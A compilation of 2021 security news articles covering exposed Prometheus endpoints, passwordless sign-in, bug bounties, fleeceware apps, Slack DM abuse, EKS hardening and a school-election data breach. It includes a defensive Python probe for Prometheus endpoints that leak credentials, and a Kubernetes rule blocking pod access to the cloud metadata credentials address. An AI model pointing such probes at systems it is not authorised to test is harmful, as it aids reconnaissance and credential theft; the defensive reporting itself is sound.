

Experts Warn of Unprotected Prometheus Endpoints Exposing Sensitive Information
15.10.21 
Security  Thehackernews
A large-scale unauthenticated scraping of publicly available and non-secured endpoints from older versions of Prometheus event monitoring and alerting solution could be leveraged to inadvertently leak sensitive information, according to the latest research.

"Due to the fact that authentication and encryption support is relatively new, many organizations that use Prometheus haven't yet enabled these features and thus many Prometheus endpoints are completely exposed to the Internet (e.g. endpoints that run earlier versions), leaking metric and label dat," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said in a report.

Prometheus is an open-source system monitoring and alerting toolkit used to collect and process metrics from different endpoints, alongside enabling easy observation of software metrics such as memory usage, network usage, and software-specific defined metrics, such as the number of failed logins to a web application. Support for Transport Layer Security (TLS) and basic authentication was introduced with version 2.24.0 released on January 6, 2021.

The findings come from a systematic sweep of publicly exposed Prometheus endpoints that were accessible on the Internet without requiring any authentication. The exposed metrics included software versions and host names, which the researchers said could be weaponized by attackers to conduct reconnaissance of a target environment before exploiting a particular server, or for post-exploitation techniques like lateral movement.

Some of the endpoints and the information disclosed are as follows:

/api/v1/status/config - Leakage of usernames and passwords provided in URL strings from the loaded YAML configuration file
/api/v1/targets - Leakage of metadata labels, including environment variables as well as user and machine names, added to target machine addresses
/api/v1/status/flags - Leakage of usernames when providing a full path to the YAML configuration file
Even more concerning, an attacker can use the "/api/v1/status/flags" endpoint to query the status of two administration interfaces — "web.enable-admin-api" and "web.enable-lifecycle" — and, if they are found to be manually enabled, exploit them to delete all saved metrics and, worse, shut down the monitoring server. It's worth noting that the two endpoints are disabled by default for security reasons as of Prometheus 2.0.

JFrog said it found about 15% of the Internet-facing Prometheus endpoints had the API management setting enabled, and 4% had database management turned on. A total of around 27,000 hosts have been identified via a search on IoT search engine Shodan.

Besides recommending that organizations "query the endpoints […] to help verify if sensitive data may have been exposed," the researchers noted that "advanced users requiring stronger authentication or encryption than what's provided by Prometheus, can also set up a separate network entity to handle the security layer."
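For defenders who want to act on that advice, the short Python sketch below probes a Prometheus host you operate for the endpoints discussed above. It is a minimal illustration only; the base URL is a placeholder, not an address from the research, and the script should only be pointed at systems you are authorized to test.

import json
import urllib.request

# Endpoints highlighted in the JFrog research as potentially leaking data.
SENSITIVE_PATHS = [
    "/api/v1/status/config",  # loaded YAML config, may embed credentials in URLs
    "/api/v1/targets",        # target metadata labels, user and machine names
    "/api/v1/status/flags",   # reveals web.enable-admin-api / web.enable-lifecycle
]

def check_prometheus(base_url, timeout=5):
    """Report which sensitive endpoints answer without authentication."""
    for path in SENSITIVE_PATHS:
        url = base_url.rstrip("/") + path
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                data = json.loads(resp.read().decode()).get("data", {})
                keys = list(data) if isinstance(data, dict) else []
                print(f"[exposed] {url} (HTTP {resp.status}) data keys: {keys[:5]}")
        except Exception as exc:
            print(f"[blocked or unreachable] {url}: {exc}")

if __name__ == "__main__":
    # Placeholder address: point this at a Prometheus instance you own.
    check_prometheus("http://prometheus.example.internal:9090")

If any of the three paths returns data without credentials, the instance should be placed behind TLS and authentication (available natively since Prometheus 2.24.0) or behind a reverse proxy that handles the security layer.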


You Can Now Sign-in to Your Microsoft Accounts Without a Password
19.9.21 
Security   Thehackernews

Microsoft on Wednesday announced a new passwordless mechanism that allows users to access their accounts without a password by using Microsoft Authenticator, Windows Hello, a security key, or a verification code sent via SMS or email.

The change is expected to be rolled out in the coming weeks.

"Except for auto-generated passwords that are nearly impossible to remember, we largely create our own passwords," said Vasu Jakkal, Microsoft's corporate vice president for Security, Compliance, and Identity. "But, given the vulnerability of passwords, requirements for them have gotten increasingly complex in recent years, including multiple symbols, numbers, case sensitivity, and disallowing previous passwords."

"Passwords are incredibly inconvenient to create, remember, and manage across all the accounts in our lives," Jakkal added.

Over the years, weak passwords have emerged as the entry point for a vast majority of attacks across enterprise and consumer accounts, so much so that Microsoft said there are about 579 password attacks every second, translating to a whopping 18 billion every year.

The situation has also been exacerbated by the need to create passwords that are not only secure but are also easy to remember, often resulting in users reusing the same password for multiple accounts or relying on easy-to-guess passwords, ultimately making them vulnerable to brute-force password spraying attacks.

Jakkal notes that 15% of people use their pets' names for password inspiration, along with family names and important dates like birthdays, while others bank on a formula for their passwords, "like Fall2021, which eventually becomes Winter2021 or Spring2022."

By dropping passwords out of the equation, the idea is to make it difficult for malicious actors to gain access to an account by leveraging a combination of factors such as your phone (something you have) and biometrics (something you are) for identification.

Customers can use the new feature to sign in to Microsoft services such as Microsoft 365, Teams, Outlook, OneDrive, and Family Safety, but only after linking their personal accounts to an authenticator app like Microsoft Authenticator and turning on the "Passwordless Account" setting under Advanced Security Options > Additional Security Options.


Fighting the Rogue Toaster Army: Why Secure Coding in Embedded Systems is Our Defensive Edge
10.9.21 
Security  Thehackernews

There are plenty of pop culture references to rogue AI and robots, and appliances turning on their human masters. It is the stuff of science fiction, fun, and fantasy, but with IoT and connected devices becoming more prevalent in our homes, we need more discussion around cybersecurity and safety.

Software is all around us, and it's very easy to forget just how much we're relying on lines of code to do all those clever things that provide us so much innovation and convenience.

Much like web-based software, APIs, and mobile devices, vulnerable code in embedded systems can be exploited if it is uncovered by an attacker.

While it's unlikely that an army of toasters is coming to enslave the human race (although, the Tesla bot is a bit concerning) as the result of a cyberattack, malicious cyber events are still possible. Some of our cars, planes, and medical devices also rely on intricate embedded systems code to perform key tasks, and the prospect of these objects being compromised is potentially life-threatening.

As with every other type of software out there, developers are among the first to get their hands on the code, right at the beginning of the creation phase. And as with every other type of software, this can be the breeding ground for insidious, common vulnerabilities that could go undetected before the product goes live.

Developers are not security experts, nor should any company expect them to play that role, but they can be equipped with a far stronger arsenal to tackle the kind of threats that are relevant to them. Embedded systems - typically written in C and C++ - will be in more frequent use as our tech needs continue to grow and change, and specialized security training for the developers on the tools in this environment is an essential defensive strategy against cyberattacks.

Exploding air fryers, wayward vehicles… are we in real danger?
While there are some standards and regulations around secure development best practices to keep us safe, we need to make far more precise, meaningful strides towards all types of software security. It might seem far-fetched to think of a problem that can be caused by someone hacking into an air fryer, but it has happened in the form of a remote code execution attack (allowing the threat actor to raise the temperature to dangerous levels), as have vulnerabilities leading to vehicle takeovers.

Vehicles are especially complex, with multiple embedded systems onboard, each taking care of micro functions; everything from automatic wipers, to engine and braking capabilities. Intertwined with an ever-increasing stack of communication technologies like Wi-Fi, Bluetooth, and GPS, the connected vehicle represents a complex digital infrastructure that is exposed to multiple attack vectors. And with 76.3 million connected vehicles expected to hit roads globally by 2023, that represents a monolith of defensive foundations to lay for true safety.

MISRA is a key organization in the good fight against embedded systems threats, having developed guidelines to facilitate code safety, security, portability and reliability in the context of embedded systems. These guidelines are a north star among the standards that every company must strive for in their embedded systems projects.

However, to create and execute code that adheres to this gold standard takes embedded systems engineers who are confident - not to mention security-aware - on the tools.

Why is embedded systems security upskilling so specific?
The C and C++ programming languages are geriatric by today's standards, yet remain widely used. They form the functioning core of the embedded systems codebase, and Embedded C/C++ enjoys a shiny, modern life as part of the connected device world.

Despite these languages having rather ancient roots - and displaying similar vulnerability behaviors in terms of common problems like injection flaws and buffer overflow - for developers to truly have success at mitigating security bugs in embedded systems, they must get hands-on with code that mimics the environments they work in. Generic C training in general security practices simply won't be as potent and memorable as if extra time and care is spent working in an Embedded C context.

With anywhere from a dozen to over one hundred embedded systems in a modern vehicle, it's imperative that developers are given precision training on what to look for, and how to fix it, right in the IDE.

Protecting embedded systems from the start is everyone's responsibility
The status quo in many organizations is that speed of development trumps security, at least when it comes to developer responsibility. They're rarely assessed on their ability to produce secure code, but rapid development of awesome features is the marker of success. The demand for software is only going to increase, but this is a culture that has set us up for a losing battle against vulnerabilities, and the subsequent cyberattacks they allow.

If developers are not trained, that's not their fault, and it's a hole that someone in the AppSec team needs to help fill by recommending the right accessible (not to mention assessable) programs of upskilling for their entire development community. Right at the beginning of a software development project, security needs to be a top consideration, with everyone - especially developers - given what they need to play their part.

Getting hands-on with embedded systems security problems
Buffer overflow, injection flaws, and business logic bugs are all common pitfalls in embedded systems development. When buried deep in a labyrinth of microcontrollers in a single vehicle or device, they can spell disaster from a security perspective.

Buffer overflow is especially prevalent, and if you want to take a deep dive into how it helped compromise that air fryer we talked about before (allowing remote code execution), check out this report on CVE-2020-28592.

Now, it's time to get hands-on with a buffer overflow vulnerability in real embedded C/C++ code. Play this challenge to see if you can locate, identify, and fix the poor coding patterns that lead to this insidious bug.


Researchers Propose Machine Learning-based Bluetooth Authentication Scheme
3.9.21 
Security  Thehackernews

A group of academics has proposed a machine learning approach that uses authentic interactions between devices in Bluetooth networks as a foundation to handle device-to-device authentication reliably.

Called "Verification of Interaction Authenticity" (aka VIA), the recurring authentication scheme aims to solve the problem of passive, continuous authentication and automatic deauthentication once two devices are paired with one another, which remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires.

"Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact as long as the devices exist, or until they transfer ownership," Travis Peters, one of the co-authors of the study, said.

"The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security makes indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised," Peters added.

Authentication is a process to verify that an individual or a system is, in fact, who or what it claims to be. While authentication can also be achieved by identification (something you are), the latest research approaches it from a verification perspective in that it aims to validate that apps and devices interact in a manner that's consistent with their prior observations. In other words, the device's interaction patterns act as a barometer of its overall behavior.

To this end, the recurring validation of interaction patterns allows for authenticating the device by cross-checking the device's behavior against a previously learned machine learning model that represents typical, trustworthy interactions, with the first authentication factor being the use of traditional Bluetooth identifiers and credentials.

"For example, a user that has a blood-pressure device may really only care if a blood-pressure monitor device is 'hooked up' to the measurement app, and is operating in a way that is consistent with how a blood-pressure monitor should operate," the researchers outlined.

"Presumably, so long as these properties hold, there is no immediate or obvious threat. If, however, a device connects as a blood-pressure monitor and then goes on to interact in a way that is inconsistent with typical interactions for this type of device, then there may be cause for concern."

VIA works by extracting features from packet headers and payloads and comparing them to a verification model to corroborate whether the ongoing interactions are consistent with this known authentic behavioral model, and if so, permit the devices to continue communicating with each other. As a consequence, any deviation from authentic interactions will result in failed verification, allowing devices to take steps to mitigate any future threat.

The model is constructed using a combination of features, such as n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality. The dataset consists of a collection of 300 Bluetooth HCI network traces that capture interactions between 20 distinct smart health and smart home devices and 13 different smartphone apps installed on a Nexus 5 smartphone running Android 6.0.1.
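The researchers' model and dataset are not reproduced here, but the verification idea can be sketched with a one-class model trained on known-authentic traffic. In the minimal Python sketch below, the feature choices (packet length, directionality) follow the article's description, while the synthetic traffic windows and the OneClassSVM model are illustrative assumptions, not the authors' implementation.

import numpy as np
from sklearn.svm import OneClassSVM

rng = np.random.default_rng(0)

def featurize(window):
    """window: array of (packet_length, direction) rows for one traffic slice."""
    lengths, directions = window[:, 0], window[:, 1]
    return np.array([lengths.mean(), lengths.std(), directions.mean()])

# Synthetic stand-in for windows of known-authentic HCI traffic from one device type.
authentic_windows = [
    np.column_stack([rng.normal(60, 5, 50), rng.integers(0, 2, 50)])
    for _ in range(200)
]

# Learn a profile of "typical, trustworthy interactions" for this device type.
model = OneClassSVM(nu=0.05).fit(np.stack([featurize(w) for w in authentic_windows]))

def verify(window):
    """Recurring check: does this window match the learned authentic profile?"""
    return model.predict(featurize(window).reshape(1, -1))[0] == 1

A window that deviates from the learned profile fails verification, which mirrors the paper's idea of treating interaction patterns as a second, behavioral authentication factor alongside traditional Bluetooth identifiers.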

"We see VIA's recurring verification of interaction patterns as a sort of second factor for authenticating the device," the researchers said. "As a result of this scheme, we introduce the notion of recurring behavioral authentication for Bluetooth connections, which can be integrated into a Bluetooth gateway device, such as a smartphone."


Microsoft Offers Up To $30K For Teams Bugs

26.3.2021 Security  Threatpost

A bug-bounty program launched for the Teams desktop videoconferencing and collaboration application has big payouts for finding security holes.

Microsoft wants to send the message that the company is serious about the security of its popular Teams desktop application and it's willing to put some cash behind the talk. A new bug-bounty program offers up to $30,000 for security vulnerabilities, with top payouts going to those with the most potential to expose Teams user data.

“The Teams desktop client is the first in-scope application under the new Apps Bounty Program, we look forward to sharing updates as we bring additional apps into this bounty program scope,” program manager Lynn Miyashita said in a statement about the launch.

Researchers can claim five scenario-based awards under the new Apps Bounty Program, ranging from $6,000 to $30,000, with the highest payouts available for “vulnerabilities that have the highest potential impact on customer privacy and security,” the company said.

General bounties are awarded between $500 and $15,000, with other incentives: Standout bug hunters can earn a spot on Microsoft’s “Researcher Recognition Program” and eligibility for the yearly MSRC Most Valuable Security Researcher list, Miyashita explained.

Security researchers with Teams online vulnerabilities to report will still submit those through the Online Services Program, the announcement added.

Bug-Bounty Programs Inspire Customer Confidence
Beyond offering a nice payday for security researchers, the move to dedicate a bug-bounty program to Teams gives Microsoft a measure of brand support with customers, judging from a recent survey.

Conducted by the Ponemon Institute and commissioned by Intel, the poll found that three-quarters of IT pros in charge of purchasing tech prefer to buy from vendors who are proactive about security. Bug-bounty programs are increasingly part of that package.

“Security doesn’t just happen,” Suzy Greenberg, vice president, Intel Product Assurance and Security, said about the Ponemon Institute survey findings. “If you are not finding vulnerabilities, then you are not looking hard enough.”

Certainly, the cloud-collaboration market has seen plenty of security bugs and breaches in recent months, particularly following lockdowns, when these services became vital to everyday business.

Collaboration App Security Storm
Teams has been used in phishing lure scams, and last fall attackers used fake Teams updates to target users with malware.

Rival cloud-collab service Zoom has also had its share of embarrassing security fails, including a vanity URL zero-day flaw discovered last July, re-occurring Zoom bombings, impersonation attacks and this month’s Zoom screen-sharing glitch, which “briefly” leaked sensitive data.

The launch of Microsoft’s bug bounty program will both help root out these flaws before they become headlines and signal a renewed commitment to proactive security.

“Partnering with the security research community is an important part of Microsoft’s holistic approach to defending against security threats,” Microsoft’s Miyashita wrote.


Fleeceware Apps Bank $400M in Revenue

26.3.2021 Security  Threatpost
The cache of apps, found in Apple’s and Google’s official marketplaces, is largely targeted toward children, and includes several “slime simulators.”

About 204 different “fleeceware” applications with a combined billion+ downloads have raked in more than $400 million in revenue so far, via the Apple App Store and Google Play, analysis has revealed.

Fleeceware apps generally offer users a free trial to “test” the app, before commencing automatic payments that can be exorbitant. In an analysis from Avast released on Wednesday, some of those subscriptions can reach $3,400 or more per year. And often, users are charged even after they’ve deleted the offending application.

“These applications generally have no unique functionality and are merely conduits for fleeceware scams,” said Avast researcher Jakub Vávra, in the posting. “While the applications generally fulfill their intended purpose, it is unlikely that a user would knowingly want to pay such a significant recurring fee for these applications, especially when there are cheaper or even free alternatives on the market.”

The company found that most of the offending apps (which were flagged to Apple and Google for review) are musical instrument apps, palm readers, image editors, camera filters, fortune tellers, QR code and PDF readers, and something called “slime simulators,” which allow users to play with virtual goo. Clearly, many of these apps are marketed towards children. Unfortunately, parents often only figure out the source of the charges weeks or months later, according to the research.

“It appears that part of the fleeceware strategy is to target younger audiences through playful themes and catchy advertisements on popular social networks with promises of ‘free installation’ or ‘free to download,'” Vávra said. “By the time parents notice the weekly payments, the fleeceware may have already extracted significant amounts of money.”

3-Day Free Trials
Most of the apps that Avast discovered are offering a free three-day trial, according to the research. After that, the models vary. Most of the apps charge between $4 to $12 per week, which equates to $208 to $624 per year; but others charge as much as $66 per week, totaling $3,432 per year.

Avast also found several applications that were previously free or only required a one-off fee to unlock features; now, they have converted to charging expensive weekly subscriptions, with or without users’ knowledge.

Vávra noted that most of the apps are spreading via normal advertising channels, such as Facebook, Instagram, Snapchat and TikTok.

“As these applications are not considered malware and are available on official app stores, they also have access to official advertisement channels to spread the fleeceware scheme,” he noted. “Due to this scheme’s lucrative nature, the actors are likely investing substantial amounts of money to further propagate these apps via popular platforms.”

Once the user clicks on an ad (which usually features a video of the app that doesn’t match its actual features), the person is redirected to the app’s profile, usually featuring a four or five-star review average.

“The app profile looks official and doesn’t raise red flags at first sight,” the researcher said. “However, upon closer investigation, it becomes apparent that a big portion of the reviews are fake (they contain repeating text or are poorly-worded and generic in nature). There is reason to believe this form of review boosting is becoming a more prominent practice.”

Uninstalling Doesn’t Help
The worst part might be the quasi-permanent state of the “infection.” Vávra pointed out that both Google and Apple state that they aren’t responsible for subscription refunds after a certain time period, leaving victims with the app developers themselves as their main recourse.

“As evidenced by reviews, the developers can simply choose to ignore the users or claim the user’s knowledge about the subscription fee and refuse to refund the victims,” he said. “Several developer profiles that our team discovered provided links to discontinued websites or contact forms. All in all, it appears there is very little that victims can do in these scenarios other than contacting their bank and requesting a chargeback.”

The good news is that Google surfaces a notification prompt that warns users of active subscriptions for uninstalled apps; and Apple asks users whether they want to keep subscriptions when a user uninstalls an app. But there’s much more to be done, according to Vávra. For instance, apps could be required to ask for another confirmation before paying money for the actual subscription once the free trial is over. And, Apple and Google could remove and filter out fake and automated reviews.

Persistent App Scourge
For now, it’s likely this scourge will stick around. In January, Sophos research uncovered that these types of apps had been installed nearly 600 million times on more than 100 million devices, from Google Play alone.

“The data is startling: With nearly a billion downloads and hundreds of millions of dollars in revenue, this model is attracting more developers and there is evidence to suggest several popular existing apps have updated to include the free trial subscription with high recurring fees,” Vávra said. “Unfortunately, this endeavour can be lucrative even if a small percentage of users fall victim to fleeceware.”


New Slack Connect DM Feature Raises Security Concerns
26.3.2021
Security  Securityweek

Business communications platform Slack rushed to take action on Wednesday after customers raised security-related concerns regarding a new feature that allows users to send direct messages to any other Slack user.

The new direct message feature, officially launched on Wednesday, is part of the Slack Connect service, which is advertised by the company as an efficient way for organizations to communicate with partners, vendors and customers — basically an alternative for email. The new DM feature enables paying customers to “quickly and securely connect with anyone outside of [their] organisation” based on their email address.

“Simply send an invite to any partner, and start messaging in Slack as soon as the other side accepts, speeding up the work that often starts over back-and-forth emails. A salesperson can form a direct line of contact to prospects, or a customer service agent can triage an issue faster, without waiting for the other side to check their email,” Slack wrote in a blog post announcing the new feature.

Slack says more than 750,000 companies use its services, but the new DM feature is currently only available to roughly 74,000 paying customers. Slack does plan on expanding the DM feature to all customers, including those on free subscriptions, in the future. The feature is enabled by default, but administrators can opt out, Slack says in its documentation.

The problem raised by many after the feature was announced was related to the customizable text that users could include in a Connect DM invite sent out to someone.

Some users pointed out how easily the feature could be abused to harass others. The text a user could add to an invitation was sent via email from a generic Slack email address. Blocking this Slack email address to stop receiving abusive messages would also mean blocking other, potentially important Slack messages.


Hours later, Slack announced that — based on user feedback — it removed the ability to send custom messages when sending out invitations for Connect DMs.

“Slack Connect’s security features and robust administrative controls are a core part of its value both for individual users and their organizations. We made a mistake in this initial roll-out that is inconsistent with our goals for the product and the typical experience of Slack Connect usage. As always, we are grateful to everyone who spoke up, and we are committed to fixing this issue,” Slack said.

Dirk Schrader, global VP of security research at New Net Technologies (NNT), a Florida-based provider of cybersecurity and compliance software, told SecurityWeek, “Product management is always about user experience, about features that help and support users in what they do with the product. This one falls into the ‘it's compiled, roll it out’ category of not thinking twice about how a feature is potentially used by someone with malicious intent. This gaffe by Slack has been quickly identified and stopped, but puts some shadow on its roadmap process and the way features are selected and verified from all kinds of security aspects a user can be concerned of, including bullying.”

Some security experts also raised concerns about how the DM feature could be abused for phishing. And once the targeted user has accepted an invitation to connect, a bad actor could abuse file upload features to deliver malware.

While the DM feature can be useful, it could cause a lot of headaches for administrators and security teams.

“For many employees, Slack is seen as a trusted communication zone. This [feature] changes that for orgs,” said Rachel Tobac, CEO of SocialProof Security, a company that provides social engineering and hacking training. “If those outside the trusted space have access, it’s now an attack option. As a pentester I used to use more spoofable comms like email, SMS, & phone to attack & now I’ll try Slack too.”

“This is a lot of work on Slack admins to manage which DMs/channels are allowed or available. For instance, I’m added to an org’s internal slack for 1 project — still have limited access but I can add others & the admin has to approve. This will increase admin fatigue & mistakes,” she added.

“I’ll be watching this new Slack feature closely to see how cyber criminals use it to send malware to folks within orgs, and how it’s leveraged in phishing,” Tobac said.

Oliver Tavakoli, CTO at Vectra, a San Jose, Calif.-based provider of technology which applies AI to detect and hunt for cyber attackers, also commented on the topic.

“When a collaboration platform adds features which extend beyond a single organization’s boundary, a complex set of issues inevitably arise. Email has historically been the primary channel for such interactions and we have spent the last couple of decades adding checks for inappropriate content, phishing, malware, etc. to that channel. Slack’s decision to enable such a channel without any of those controls in place appears to have totally ignored this historical context,” Tavakoli told SecurityWeek.


Microsoft Offers Up to $30,000 for Vulnerabilities in Teams Desktop Client
26.3.2021
Security  Securityweek

Microsoft on Wednesday announced that its bug bounty programs now also cover the desktop client of its Teams business communications platform.

The tech giant is offering rewards for vulnerabilities in the Teams desktop client as part of its Application Bounty Program, which will feature additional app-related bounties in the future.

The Teams desktop client bug bounty program complements the existing awards for vulnerabilities in online Teams services.

Microsoft says researchers can earn between $500 and $15,000 for general vulnerabilities in the Teams desktop client, and between $6,000 and $30,000 if they demonstrate an exploit that fits one of five scenarios.

For example, white hat hackers can earn up to $30,000 for remote code execution with no user interaction, and $15,000 for the ability to obtain authentication credentials for other users without leveraging phishing attacks.


Microsoft reported in August 2020 that it had paid out nearly $14 million through its bug bounty programs in the past year. The single biggest reward was $200,000.


Why Focusing on Container Runtimes Is the Most Critical Piece of Security for EKS Workloads
20.3.2021
Security  Securityaffairs

Amazon Elastic Kubernetes Service (EKS) is a platform that gives customers the ability to run Kubernetes apps in the AWS cloud or on premises.
Organizations are increasingly turning to Kubernetes to manage their containers. In the 2020 Cloud Native Survey, 91% of respondents told the Cloud Native Computing Foundation (CNCF) that they were using Kubernetes—an increase from 78% in 2019 and 58% a year earlier. More than four-fifths (83%) of that year’s survey participants said that they were running Kubernetes in their production environment.

These findings reflect the fact that organizations are turning to Kubernetes in order to minimize application downtime. According to its documentation, Kubernetes comes with load balancing features that help to distribute high network traffic and keep the deployment stable. It also enables admins to describe the desired state of their containers and use that specification to change the actual state of those containers to the desired state. If any of the containers don’t respond to a user-defined health check in the meantime, Kubernetes can use its self-healing properties to kill those containers and replace them with new ones.

Amazon EKS and the Need for Security

Some organizations are setting up their own environments to take advantage of Kubernetes’ benefits, while others are turning to vendor-managed platforms. Regarding the latter, one of the most popular of those options is Amazon Elastic Kubernetes Service (EKS), a platform which gives customers the ability to run Kubernetes apps in the AWS cloud or on premises. Amazon EKS comes with many benefits including the ability to automatically detect and replace unhealthy control plane nodes as well as scale their resources efficiently. It also applies the newest security patches to a cluster’s control plane as a means of giving customers a more secure Kubernetes environment.

With that last point in mind, perhaps the most important element of EKS security is the need to limit the permissions and capabilities of container runtimes. Container runtimes are dynamic in nature; they’re constantly spinning up and winding down. This dynamism makes it difficult for admins to maintain visibility of their containers, notes Help Net Security, a fact which malicious actors commonly exploit to conduct scans, perform attacks and launch data exfiltration attempts. As such, admins need to vet all of their activities within the container application environment to ensure that their organizations aren’t under attack.

Best Practices for Container Runtime Security in EKS
Admins can follow some best practices to ensure container runtime security in EKS. Those recommendations include the following:

Be Strategic with Namespaces

Admins need to be careful with their namespaces, names which help them to divide cluster resources between multiple users. Specifically, they should use their namespaces liberally and in a way that supports their applications. This latter point involves privilege segregation, a process which ensures all workloads that are managed by different teams have their own namespace.

Implement Role-Based Access Control
As noted elsewhere in Kubernetes’ documentation, Role-Based Access Control (RBAC) is a means by which admins can regulate access to computer or network resources based on individual users’ roles. The RBAC API does this by declaring four kinds of objects:

Role: This API object is a set of permissions that’s given within a specific namespace.
ClusterRole: Like a role, a ClusterRole contains rules that represent a set of permissions. But this API object is a non-namespaced resource that enables admins to define permissions across all namespaces and on cluster-scoped resources.
RoleBinding: This API object takes the permissions defined by a Role and assigns them to a user or a group of users within a namespace.
ClusterRoleBinding: Using the permissions contained within a ClusterRole, a ClusterRoleBinding assigns those rights across all namespaces in the cluster.
To secure the container runtime environment, admins should consider following the principle of least privilege when working with these four API objects. In particular, they might consider limiting their use of ClusterRoles and ClusterRoleBindings, as these assignments could enable an attacker to move to other cluster resources if they compromise a single user account.
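As a concrete illustration of that least-privilege approach, the sketch below uses the official Kubernetes Python client to create a read-only, namespace-scoped Role and bind it to a single user. The namespace, role and user names are placeholder assumptions, not values from the article, and the manifests are passed as plain dictionaries.

from kubernetes import client, config

config.load_kube_config()          # or load_incluster_config() inside a pod
rbac = client.RbacAuthorizationV1Api()

namespace = "team-a"               # placeholder namespace

# Least-privilege Role: read-only access to Pods, scoped to one namespace.
role = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"name": "pod-reader", "namespace": namespace},
    "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}],
}

# Bind the Role to one user inside the same namespace (no ClusterRoleBinding needed).
binding = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "RoleBinding",
    "metadata": {"name": "pod-reader-binding", "namespace": namespace},
    "subjects": [{"kind": "User", "name": "dev-alice", "apiGroup": "rbac.authorization.k8s.io"}],
    "roleRef": {"kind": "Role", "name": "pod-reader", "apiGroup": "rbac.authorization.k8s.io"},
}

rbac.create_namespaced_role(namespace, role)
rbac.create_namespaced_role_binding(namespace, binding)

Granting the same verbs through a ClusterRole and ClusterRoleBinding would expose every namespace if the bound account were ever compromised, which is exactly what the least-privilege guidance above tries to avoid.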

Use Network Policies for Cluster Traffic Control

Pods are non-isolated by default, as noted on Kubernetes’ website. These groups of containers accept traffic from any source. Knowing that, a malicious actor could compromise a single pod and leverage that event to move laterally to other pods and cluster resources.

Admins can defend against this type of event by creating a Network Policy that selects their pods and rejects any connections that are not specified within their terms. Admins can begin by creating a Network Policy with egress and ingress policies that support their organization’s security requirements. They can then select whichever pods they want to protect using those specified network connection rules.
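Below is a minimal sketch of such a policy, again expressed as a plain manifest applied through the Kubernetes Python client; the labels and namespace are assumptions for illustration, and the cluster's CNI must actually enforce NetworkPolicy (for example Calico) for the rules to take effect.

from kubernetes import client, config

config.load_kube_config()
net = client.NetworkingV1Api()

policy = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "NetworkPolicy",
    "metadata": {"name": "db-allow-api-only", "namespace": "team-a"},
    "spec": {
        "podSelector": {"matchLabels": {"app": "db"}},   # pods to protect
        "policyTypes": ["Ingress", "Egress"],
        # Only pods labelled role=api may connect in; all other ingress is rejected.
        "ingress": [{"from": [{"podSelector": {"matchLabels": {"role": "api"}}}]}],
        # No egress rules listed: all outbound traffic from the selected pods is denied.
        "egress": [],
    },
}

net.create_namespaced_network_policy("team-a", policy)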

Enforce Security Contexts Using OPA Gatekeeper
Kubernetes enables admins to define privilege and access control settings for a pod or container using what's known as security contexts. They can then enforce those security contexts within their Kubernetes environment using Gatekeeper. Built on the Open Policy Agent (OPA), this tool allows admins to do the same types of things that they'd want to do with the soon-to-be-deprecated Pod Security Policies (PSPs). However, Gatekeeper lets admins go a step further through the creation of custom policies that designate allowed container registries, impose pod resource limits and interact with almost any other parameter that admins can think of.

Protect IAM Credentials of the Nodes’ IAM Instance Role

Here’s StackRox with some guidance on how to implement this security measure:

The nodes are standard EC2 instances that will have an IAM role and a standard set of EKS permissions, in addition to permissions you may have added. The workload pods should not be allowed to grab the IAM’s credentials from the EC2 metadata point. You have several options for protecting the endpoint that still enable automated access to AWS APIs for deployments that need it. If you don’t use kube2iam or kiam, which both work by intercepting calls to the metadata endpoint and issuing limited credentials back to the pod based on your configuration, install the Calico CNI so you can add a Network Policy to block access to the metadata IP, 169.254.169.254.
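If kube2iam or kiam is not in use, the metadata-blocking policy mentioned above can look roughly like the sketch below. This is a hedged illustration of a standard egress rule with an ipBlock exception; the namespace is a placeholder, and a CNI that enforces NetworkPolicy (such as Calico) is assumed.

# Egress rule for workload pods: allow outbound traffic anywhere except the
# EC2 instance metadata address, so pods cannot grab the node's IAM credentials.
metadata_block = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "NetworkPolicy",
    "metadata": {"name": "deny-ec2-metadata", "namespace": "team-a"},
    "spec": {
        "podSelector": {},                  # apply to every pod in the namespace
        "policyTypes": ["Egress"],
        "egress": [{
            "to": [{"ipBlock": {"cidr": "0.0.0.0/0", "except": ["169.254.169.254/32"]}}]
        }],
    },
}
# Apply it the same way as the policy above:
# client.NetworkingV1Api().create_namespaced_network_policy("team-a", metadata_block)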

EKS Security on a Broader Scale
The guidance provided above can help admins ensure container runtime security in Amazon EKS. For more information about other aspects of Amazon EKS security, consult the official Amazon EKS documentation.


Mom & Daughter Duo Hack Homecoming Crown
17.3.2021
Security  Threatpost

A Florida high-school student faces jail time for rigging her school’s Homecoming Queen election.

A 17-year-old high school senior along with her mother, Laura Rose Carroll, were arrested this week, charged with accessing student records in a fraudulent attempt to rig her school’s Homecoming Queen election.

Carroll worked as an assistant principal at Bellview Elementary School in the Escambia County School District in Cantonment, Fla. — the same district where her daughter attended Tate High School, the Washington Post reported. Authorities were tipped off to the fake votes after the daughter bragged to other students about using her mom’s access to “FOCUS,” the district student-information system, to cast votes in the election for the school’s Homecoming Court from student accounts, without their knowledge.

Tate High School’s student body of about 2,000 had two days between Oct. 28 and 30 to cast their votes for Homecoming Court through “Election Runner,” a system frequently used by the school for election-type activities. It requires students to provide their school-ID numbers and birth dates before they can vote.

On Oct. 31, Carroll’s daughter was crowned Homecoming Queen, but the victory was short-lived. The Washington Post said that before the vote window was closed, Election Runner sent an alert to the school warning that many of the votes were suspected to be fraudulent.

‘FOCUS’ Student-Data System Breached
Carroll’s daughter didn’t seem too worried about hiding the fraud, since she bragged to fellow students about the stolen votes. Arrest records document about 117 votes from the same IP address, which investigators were able to trace back to Carroll’s home and cellphone, the Post reported.

“She looks up all of our group of friends’ grades and makes comments about how she can find our test scores all the time,” one student said, in a written statement.

“I recall times that she logged onto her mom’s FOCUS account and openly shared information, grades, schedules, etc., with others,” another student’s statement read. “She did not seem like logging in was a big deal, and was very comfortable with doing so.”

